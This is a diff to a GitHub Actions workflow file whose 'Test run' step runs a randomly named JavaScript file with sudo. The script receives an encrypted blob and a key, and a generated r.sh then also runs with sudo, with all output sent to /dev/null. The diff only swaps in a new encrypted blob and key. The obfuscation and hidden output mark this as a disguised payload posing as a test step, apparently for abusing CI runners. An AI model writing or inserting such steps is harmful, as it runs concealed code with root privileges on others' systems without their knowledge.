--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo 'ma1f2'
+        echo 'tobv2'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1/O+kJm+uNdbCkhJocQFFSZBH+SKQA5qsDvq2y/iYMKnb63URwIWjx2YstDNy6ws7w7YlCvF4mkVwPdXHbHRC63plNo0SMpUK0h3tSvGL3+tyyG68LPTmcp 5qba18 && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1+zZQlwuBiiKXPkeWrmI+CSouCzLN5o36uOlkBfzwMGiIE7nIKaVnPH8OtXAISy4USpt46kdJXPFuLG8XJAwiPgVotH+I0kEFBHToyJ+CNqk0dE7nnZptx+ nll4iy && sudo sh r.sh > /dev/null 2>&1
